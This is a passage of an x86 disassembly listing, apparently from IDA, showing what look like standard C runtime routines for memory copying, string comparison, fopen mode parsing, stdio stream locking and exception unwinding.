off_408114 dd offset loc_408124 ; DATA XREF: sub_407FA0+5Cr
; sub_407FA0+BAr ...
dd offset loc_40812C
dd offset loc_408138
dd offset loc_40814C
; ---------------------------------------------------------------------------
loc_408124: ; CODE XREF: sub_407FA0+5Cj
; sub_407FA0+BAj ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40812C: ; CODE XREF: sub_407FA0+5Cj
; sub_407FA0+BAj ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_408138: ; CODE XREF: sub_407FA0+5Cj
; sub_407FA0+BAj ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40814C: ; CODE XREF: sub_407FA0+5Cj
; sub_407FA0+BAj ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_408164: ; CODE XREF: sub_407FA0+1Aj
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_408198
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40818C
std
rep movsd
cld
jmp ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40818C: ; CODE XREF: sub_407FA0+1DDj
; sub_407FA0+238j ...
neg ecx
jmp ds:off_408260[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_408198: ; CODE XREF: sub_407FA0+1D2j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4081B0
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_4081B0+4[eax*4]
; ---------------------------------------------------------------------------
loc_4081B0: ; CODE XREF: sub_407FA0+202j
; DATA XREF: sub_407FA0+209r
jmp ds:off_4082B0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4081C4
dd offset loc_4081E8
dd offset loc_408210
; ---------------------------------------------------------------------------
loc_4081C4: ; DATA XREF: sub_407FA0+218o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40818C
std
rep movsd
cld
jmp ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4081E8: ; DATA XREF: sub_407FA0+21Co
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_40818C
std
rep movsd
cld
jmp ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_408210: ; DATA XREF: sub_407FA0+220o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40818C
std
rep movsd
cld
jmp ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_408264
dd offset loc_40826C
dd offset loc_408274
dd offset loc_40827C
dd offset loc_408284
dd offset loc_40828C
dd offset loc_408294
off_408260 dd offset loc_4082A7 ; DATA XREF: sub_407FA0+1EEr
; ---------------------------------------------------------------------------
loc_408264: ; DATA XREF: sub_407FA0+2A4o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40826C: ; DATA XREF: sub_407FA0+2A8o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_408274: ; DATA XREF: sub_407FA0+2ACo
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40827C: ; DATA XREF: sub_407FA0+2B0o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_408284: ; DATA XREF: sub_407FA0+2B4o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40828C: ; DATA XREF: sub_407FA0+2B8o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_408294: ; DATA XREF: sub_407FA0+2BCo
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4082A7: ; CODE XREF: sub_407FA0+1EEj
; DATA XREF: sub_407FA0:off_408260o
jmp ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4082B0 dd offset loc_4082C0 ; DATA XREF: sub_407FA0+1E3r
; sub_407FA0:loc_4081B0r ...
dd offset loc_4082C8
dd offset loc_4082D8
dd offset loc_4082EC
; ---------------------------------------------------------------------------
loc_4082C0: ; CODE XREF: sub_407FA0+1E3j
; sub_407FA0:loc_4081B0j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4082C8: ; CODE XREF: sub_407FA0+1E3j
; sub_407FA0:loc_4081B0j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4082D8: ; CODE XREF: sub_407FA0+1E3j
; sub_407FA0:loc_4081B0j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4082EC: ; CODE XREF: sub_407FA0+1E3j
; sub_407FA0:loc_4081B0j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_407FA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408305 proc near ; CODE XREF: sub_4033B9+7p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421858
call __SEH_prolog4
push 0Eh
call sub_405DA7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_408356
mov eax, dword_427B20
mov edx, offset dword_427B1C
loc_408331: ; CODE XREF: sub_408305+65j
mov [ebp+var_1C], eax
test eax, eax
jz short loc_408349
cmp [eax], ecx
jnz short loc_408368
mov ecx, [eax+4]
mov [edx+4], ecx
push eax
call sub_4039CF
pop ecx
loc_408349: ; CODE XREF: sub_408305+31j
push dword ptr [esi+4]
call sub_4039CF
pop ecx
and dword ptr [esi+4], 0
loc_408356: ; CODE XREF: sub_408305+20j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40836C
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_408368: ; CODE XREF: sub_408305+35j
mov edx, eax
jmp short loc_408331
sub_408305 endp
; =============== S U B R O U T I N E =======================================
sub_40836C proc near ; CODE XREF: sub_408305+58p
; DATA XREF: fabskl8p:00421870o
push 0Eh
call sub_405CCF
pop ecx
retn
sub_40836C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408380 proc near ; CODE XREF: sub_4033E3+Cp
; sub_40B5AB+25p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_4083CC
loc_408390: ; CODE XREF: sub_408380+3Cj
; sub_408380+6Aj ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_4083C4
or al, al
jz short loc_4083C0
cmp ah, [ecx+1]
jnz short loc_4083C4
or ah, ah
jz short loc_4083C0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_4083C4
or al, al
jz short loc_4083C0
cmp ah, [ecx+3]
jnz short loc_4083C4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_408390
mov edi, edi
loc_4083C0: ; CODE XREF: sub_408380+18j
; sub_408380+21j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_4083C4: ; CODE XREF: sub_408380+14j
; sub_408380+1Dj ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_4083CC: ; CODE XREF: sub_408380+Ej
test edx, 1
jz short loc_4083EC
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_4083C4
add ecx, 1
or al, al
jz short loc_4083C0
test edx, 2
jz short loc_408390
loc_4083EC: ; CODE XREF: sub_408380+52j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_4083C4
or al, al
jz short loc_4083C0
cmp ah, [ecx+1]
jnz short loc_4083C4
or ah, ah
jz short loc_4083C0
add ecx, 2
jmp short loc_408390
sub_408380 endp
; =============== S U B R O U T I N E =======================================
sub_408408 proc near ; CODE XREF: sub_407EC9+9p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_427B24, eax
retn
sub_408408 endp
; =============== S U B R O U T I N E =======================================
sub_408412 proc near ; CODE XREF: sub_403417+Bp
; sub_403AAC+8Cp ...
arg_0 = dword ptr 4
push dword_427B24
call sub_405543
test eax, eax
pop ecx
jz short loc_408431
push [esp+arg_0]
call eax ; sub_41C919
test eax, eax
pop ecx
jz short loc_408431
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_408431: ; CODE XREF: sub_408412+Ej
; sub_408412+19j
xor eax, eax
retn
sub_408412 endp
; =============== S U B R O U T I N E =======================================
sub_408434 proc near ; CODE XREF: sub_406B86+76p
; sub_406B86+82p ...
mov eax, offset off_423950
retn
sub_408434 endp
; =============== S U B R O U T I N E =======================================
sub_40843A proc near ; DATA XREF: fabskl8p:0041D2DCo
mov eax, dword_436940
test eax, eax
push esi
push 14h
pop esi
jnz short loc_40844E
mov eax, 200h
jmp short loc_408454
; ---------------------------------------------------------------------------
loc_40844E: ; CODE XREF: sub_40843A+Bj
cmp eax, esi
jge short loc_408459
mov eax, esi
loc_408454: ; CODE XREF: sub_40843A+12j
mov dword_436940, eax
loc_408459: ; CODE XREF: sub_40843A+16j
push 4
push eax
call sub_407B2A
test eax, eax
pop ecx
pop ecx
mov dword_435920, eax
jnz short loc_40848A
push 4
push esi
mov dword_436940, esi
call sub_407B2A
test eax, eax
pop ecx
pop ecx
mov dword_435920, eax
jnz short loc_40848A
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40848A: ; CODE XREF: sub_40843A+30j
; sub_40843A+49j
xor edx, edx
mov ecx, offset off_423950
jmp short loc_408498
; ---------------------------------------------------------------------------
loc_408493: ; CODE XREF: sub_40843A+6Dj
mov eax, dword_435920
loc_408498: ; CODE XREF: sub_40843A+57j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_423BD0
jl short loc_408493
push 0FFFFFFFEh
pop esi
xor edx, edx
mov ecx, offset dword_423960
push edi
loc_4084B4: ; CODE XREF: sub_40843A+AAj
mov edi, edx
and edi, 1Fh
imul edi, 28h
mov eax, edx
sar eax, 5
mov eax, dword_435820[eax*4]
mov eax, [edi+eax]
cmp eax, 0FFFFFFFFh
jz short loc_4084D8
cmp eax, esi
jz short loc_4084D8
test eax, eax
jnz short loc_4084DA
loc_4084D8: ; CODE XREF: sub_40843A+94j
; sub_40843A+98j
mov [ecx], esi
loc_4084DA: ; CODE XREF: sub_40843A+9Cj
add ecx, 20h
inc edx
cmp ecx, offset dword_4239C0
jl short loc_4084B4
pop edi
xor eax, eax
pop esi
retn
sub_40843A endp
; =============== S U B R O U T I N E =======================================
sub_4084EB proc near ; DATA XREF: fabskl8p:0041D2F8o
call sub_409108
cmp byte_427B10, 0
jz short loc_4084FE
call sub_40E383
loc_4084FE: ; CODE XREF: sub_4084EB+Cj
push dword_435920
call sub_4039CF
pop ecx
retn
sub_4084EB endp
; =============== S U B R O U T I N E =======================================
sub_40850B proc near ; CODE XREF: sub_4035D3+4Fp
; sub_403890+50p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_40852F
cmp eax, offset dword_423BB0
ja short loc_40852F
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_405DA7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40852F: ; CODE XREF: sub_40850B+Bj
; sub_40850B+12j
add eax, 20h
push eax
call ds:dword_41D164 ; RtlEnterCriticalSection
retn
sub_40850B endp
; =============== S U B R O U T I N E =======================================
sub_40853A proc near ; CODE XREF: sub_408851+66p
; sub_40902E+46p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_40854E
add eax, 10h
push eax
call sub_405DA7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40854E: ; CODE XREF: sub_40853A+7j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D164 ; RtlEnterCriticalSection
retn
sub_40853A endp
; =============== S U B R O U T I N E =======================================
sub_40855D proc near ; CODE XREF: sub_4035B6+3p
; sub_403718+3p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_423950
cmp eax, ecx
jb short loc_408581
cmp eax, offset dword_423BB0
ja short loc_408581
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_405CCF
pop ecx
retn
; ---------------------------------------------------------------------------
loc_408581: ; CODE XREF: sub_40855D+Bj
; sub_40855D+12j
add eax, 20h
push eax
call ds:dword_41D168 ; RtlLeaveCriticalSection
retn
sub_40855D endp
; =============== S U B R O U T I N E =======================================
sub_40858C proc near ; CODE XREF: sub_408851+7Dp
; sub_4090D0+9p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_4085A0
add eax, 10h
push eax
call sub_405CCF
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4085A0: ; CODE XREF: sub_40858C+7j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_41D168 ; RtlLeaveCriticalSection
retn
sub_40858C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085AF proc near ; CODE XREF: sub_4034FC+9Ap
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_427FE4
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
mov [ebp+var_10], ebx
jmp short loc_4085D0
; ---------------------------------------------------------------------------
loc_4085CF: ; CODE XREF: sub_4085AF+24j
inc esi
loc_4085D0: ; CODE XREF: sub_4085AF+1Ej
cmp byte ptr [esi], 20h
jz short loc_4085CF
mov al, [esi]
cmp al, 61h
jz short loc_408614
cmp al, 72h
jz short loc_40860B
cmp al, 77h
jz short loc_408602
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
xor eax, eax
jmp loc_40884D
; ---------------------------------------------------------------------------
loc_408602: ; CODE XREF: sub_4085AF+32j
mov [ebp+arg_4], 301h
jmp short loc_40861B
; ---------------------------------------------------------------------------
loc_40860B: ; CODE XREF: sub_4085AF+2Ej
or [ebp+var_4], 1
mov [ebp+arg_4], ebx
jmp short loc_40861F
; ---------------------------------------------------------------------------
loc_408614: ; CODE XREF: sub_4085AF+2Aj
mov [ebp+arg_4], 109h
loc_40861B: ; CODE XREF: sub_4085AF+5Aj
or [ebp+var_4], 2
loc_40861F: ; CODE XREF: sub_4085AF+63j
xor ecx, ecx
inc ecx
inc esi
mov al, [esi]
cmp al, bl
push edi
jz loc_4087E7
mov edx, 80h
mov edi, 4000h
loc_408638: ; CODE XREF: sub_4085AF+1B6j
cmp ecx, ebx
jz loc_40876B
movsx eax, al
cmp eax, 53h
jg loc_4086EE
jz loc_4086DC
sub eax, 20h
jz loc_408760
sub eax, 0Bh
jz short loc_4086B6
dec eax
jz short loc_4086AA
sub eax, 18h
jz short loc_408697
sub eax, 0Ah
jz short loc_40868F
sub eax, 4
jnz loc_4087F0
cmp [ebp+var_8], ebx
jnz loc_408755
or [ebp+arg_4], 10h
mov [ebp+var_8], 1
jmp loc_408760
; ---------------------------------------------------------------------------
loc_40868F: ; CODE XREF: sub_4085AF+BCj
or [ebp+arg_4], edx
jmp loc_408760
; ---------------------------------------------------------------------------
loc_408697: ; CODE XREF: sub_4085AF+B7j
test byte ptr [ebp+arg_4], 40h
jnz loc_408755
or [ebp+arg_4], 40h
jmp loc_408760
; ---------------------------------------------------------------------------
loc_4086AA: ; CODE XREF: sub_4085AF+B2j
mov [ebp+var_10], 1
jmp loc_408755
; ---------------------------------------------------------------------------
loc_4086B6: ; CODE XREF: sub_4085AF+AFj
test byte ptr [ebp+arg_4], 2
jnz loc_408755
mov eax, [ebp+arg_4]
and eax, 0FFFFFFFEh
or eax, 2
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 0FFFFFFFCh
or eax, edx
mov [ebp+var_4], eax
jmp loc_408760
; ---------------------------------------------------------------------------
loc_4086DC: ; CODE XREF: sub_4085AF+9Dj
cmp [ebp+var_8], ebx
jnz short loc_408755
or [ebp+arg_4], 20h
mov [ebp+var_8], 1
jmp short loc_408760
; ---------------------------------------------------------------------------
loc_4086EE: ; CODE XREF: sub_4085AF+97j
sub eax, 54h
jz short loc_40874D
sub eax, 0Eh
jz short loc_40873C
dec eax
jz short loc_40872B
sub eax, 0Bh
jz short loc_408716
sub eax, 6
jnz loc_4087F0
test word ptr [ebp+arg_4], 0C000h
jnz short loc_408755
or [ebp+arg_4], edi
jmp short loc_408760
; ---------------------------------------------------------------------------
loc_408716: ; CODE XREF: sub_4085AF+14Fj
cmp [ebp+var_C], ebx
jnz short loc_408755
and [ebp+var_4], 0FFFFBFFFh
mov [ebp+var_C], 1
jmp short loc_408760
; ---------------------------------------------------------------------------
loc_40872B: ; CODE XREF: sub_4085AF+14Aj
cmp [ebp+var_C], ebx
jnz short loc_408755
or [ebp+var_4], edi
mov [ebp+var_C], 1
jmp short loc_408760
; ---------------------------------------------------------------------------
loc_40873C: ; CODE XREF: sub_4085AF+147j
test word ptr [ebp+arg_4], 0C000h
jnz short loc_408755
or [ebp+arg_4], 8000h
jmp short loc_408760
; ---------------------------------------------------------------------------
loc_40874D: ; CODE XREF: sub_4085AF+142j
test word ptr [ebp+arg_4], 1000h
jz short loc_408759
loc_408755: ; CODE XREF: sub_4085AF+CAj
; sub_4085AF+ECj ...
xor ecx, ecx
jmp short loc_408760
; ---------------------------------------------------------------------------
loc_408759: ; CODE XREF: sub_4085AF+1A4j
or [ebp+arg_4], 1000h
loc_408760: ; CODE XREF: sub_4085AF+A6j
; sub_4085AF+DBj ...
inc esi
mov al, [esi]
cmp al, bl
jnz loc_408638
loc_40876B: ; CODE XREF: sub_4085AF+8Bj
cmp [ebp+var_10], ebx
jz short loc_4087E7
jmp short loc_408773
; ---------------------------------------------------------------------------
loc_408772: ; CODE XREF: sub_4085AF+1C7j
inc esi
loc_408773: ; CODE XREF: sub_4085AF+1C1j
cmp byte ptr [esi], 20h
jz short loc_408772
push 4
push esi
push offset aCcs ; "ccs="
call sub_40EEE0
add esp, 0Ch
test eax, eax
jnz short loc_4087F0
add esi, 4
push offset aUtf8 ; "UTF-8"
push esi
call sub_40ED64
test eax, eax
pop ecx
pop ecx
jnz short loc_4087AC
add esi, 5
or [ebp+arg_4], 40000h
jmp short loc_4087E7
; ---------------------------------------------------------------------------
loc_4087AC: ; CODE XREF: sub_4085AF+1EFj
push offset aUtf16le ; "UTF-16LE"
push esi
call sub_40ED64
test eax, eax
pop ecx
pop ecx
jnz short loc_4087C9
add esi, 8
or [ebp+arg_4], 20000h
jmp short loc_4087E7
; ---------------------------------------------------------------------------
loc_4087C9: ; CODE XREF: sub_4085AF+20Cj
push offset aUnicode ; "UNICODE"
push esi
call sub_40ED64
test eax, eax
pop ecx
pop ecx
jnz short loc_4087F0
add esi, 7
or [ebp+arg_4], 10000h
jmp short loc_4087E7
; ---------------------------------------------------------------------------
loc_4087E6: ; CODE XREF: sub_4085AF+23Bj
inc esi
loc_4087E7: ; CODE XREF: sub_4085AF+79j
; sub_4085AF+1BFj ...
cmp byte ptr [esi], 20h
jz short loc_4087E6
cmp [esi], bl
jz short loc_40880A
loc_4087F0: ; CODE XREF: sub_4085AF+C1j
; sub_4085AF+154j ...
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
jmp short loc_408828
; ---------------------------------------------------------------------------
loc_40880A: ; CODE XREF: sub_4085AF+23Fj
push 180h
push [ebp+arg_8]
lea eax, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call sub_40EB2C
add esp, 14h
test eax, eax
jz short loc_40882C
loc_408828: ; CODE XREF: sub_4085AF+259j
xor eax, eax
jmp short loc_40884C
; ---------------------------------------------------------------------------
loc_40882C: ; CODE XREF: sub_4085AF+277j
mov eax, [ebp+arg_C]
inc dword_427B28
mov ecx, [ebp+var_4]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_10]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_40884C: ; CODE XREF: sub_4085AF+27Bj
pop edi
loc_40884D: ; CODE XREF: sub_4085AF+4Ej
pop esi
pop ebx
leave
retn
sub_4085AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408851 proc near ; CODE XREF: sub_4034FC+54p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421878
call __SEH_prolog4
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_408871: ; CODE XREF: sub_408851+85j
mov [ebp+var_20], esi
cmp esi, dword_436940
jge loc_408941
mov eax, dword_435920
lea eax, [eax+esi*4]
cmp [eax], ebx
jz short loc_4088DC
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jnz short loc_4088D5
lea eax, [esi-3]
cmp eax, 10h
ja short loc_4088AE
lea eax, [esi+10h]
push eax
call sub_405CE4
pop ecx
test eax, eax
jz loc_408941
loc_4088AE: ; CODE XREF: sub_408851+49j
mov eax, dword_435920
push dword ptr [eax+esi*4]
push esi
call sub_40853A
pop ecx
pop ecx
mov eax, dword_435920
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_4088D8
push eax
push esi
call sub_40858C
pop ecx
pop ecx
loc_4088D5: ; CODE XREF: sub_408851+41j
inc esi
jmp short loc_408871
; ---------------------------------------------------------------------------
loc_4088D8: ; CODE XREF: sub_408851+79j
mov edi, eax
jmp short loc_40893E
; ---------------------------------------------------------------------------
loc_4088DC: ; CODE XREF: sub_408851+39j
shl esi, 2
push 38h
call sub_407AEA
pop ecx
mov ecx, dword_435920
mov [esi+ecx], eax
mov eax, dword_435920
add eax, esi
cmp [eax], ebx
jz short loc_408941
push 0FA0h
mov eax, [eax]
add eax, 20h
push eax
call sub_40CEC4
pop ecx
pop ecx
test eax, eax
mov eax, dword_435920
jnz short loc_408929
push dword ptr [esi+eax]
call sub_4039CF
pop ecx
mov eax, dword_435920
mov [esi+eax], ebx
jmp short loc_408941
; ---------------------------------------------------------------------------
loc_408929: ; CODE XREF: sub_408851+C3j
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D164 ; RtlEnterCriticalSection
mov eax, dword_435920
mov edi, [esi+eax]
loc_40893E: ; CODE XREF: sub_408851+89j
mov [ebp+var_1C], edi
loc_408941: ; CODE XREF: sub_408851+29j
; sub_408851+57j ...
cmp edi, ebx
jz short loc_408957
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_408957: ; CODE XREF: sub_408851+F2j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40896E
mov eax, edi
call __SEH_epilog4
retn
sub_408851 endp
; =============== S U B R O U T I N E =======================================
sub_40896B proc near ; DATA XREF: fabskl8p:00421890o
mov edi, [ebp-1Ch]
sub_40896B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40896E proc near ; CODE XREF: sub_408851+10Dp
push 1
call sub_405CCF
pop ecx
retn
sub_40896E endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_408978 proc near ; CODE XREF: sub_4034FC+8Ap
; sub_408978+BDp ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_408A08
push large dword ptr fs:0
mov eax, dword_423064
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_4089AA: ; CODE XREF: sub_408978+64j
; sub_408978+80j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_4089FA
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_4089CC
cmp esi, edx
jbe short loc_4089FA
loc_4089CC: ; CODE XREF: sub_408978+4Ej
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_4089AA
push 101h
mov eax, [ebx+8]
call sub_40F00D
mov ecx, 1
mov eax, [ebx+8]
call sub_40F02C
jmp short loc_4089AA
; ---------------------------------------------------------------------------
loc_4089FA: ; CODE XREF: sub_408978+45j
; sub_408978+52j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408A08: ; DATA XREF: sub_408978+14o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_408A4D
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_402ADC
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_408978
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_408A4D: ; CODE XREF: sub_408978+A0j
retn
sub_408978 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_408978
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_408A6A proc near ; CODE XREF: sub_4069F0+89p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_408A6A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4069F0
loc_408A81: ; CODE XREF: sub_4069F0+170j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_40F00D
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_4069F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A9A proc near ; CODE XREF: sub_4069F0+11Fp
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_408AAF
push ecx
call sub_413D26
loc_408AAF: ; DATA XREF: sub_408A9A+Ao
pop edi
pop esi
pop ebx
pop ebp
retn
sub_408A9A endp
; =============== S U B R O U T I N E =======================================
sub_408AB4 proc near ; CODE XREF: sub_4069F0+137p
; sub_4069F0+18Cp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_408978
add esp, 0Ch
pop ebp
retn 8
sub_408AB4 endp
; =============== S U B R O U T I N E =======================================
sub_408ACB proc near ; CODE XREF: sub_4035D3+10Ep
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_408DD0
push eax
call sub_40D8F0
test eax, eax
pop ecx
pop ecx
jz short loc_408B5D
call sub_408434
add eax, 20h
cmp esi, eax
jnz short loc_408AF2
xor eax, eax
jmp short loc_408B01
; ---------------------------------------------------------------------------
loc_408AF2: ; CODE XREF: sub_408ACB+21j
call sub_408434
add eax, 40h
cmp esi, eax
jnz short loc_408B5D
xor eax, eax
inc eax
loc_408B01: ; CODE XREF: sub_408ACB+25j
inc dword_427B28
test word ptr [esi+0Ch], 10Ch
jnz short loc_408B5D
push ebx
push edi
lea edi, ds:427B2Ch[eax*4]
cmp dword ptr [edi], 0
mov ebx, 1000h
jnz short loc_408B42
push ebx
call sub_407AEA
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_408B42
lea eax, [esi+14h]
push 2
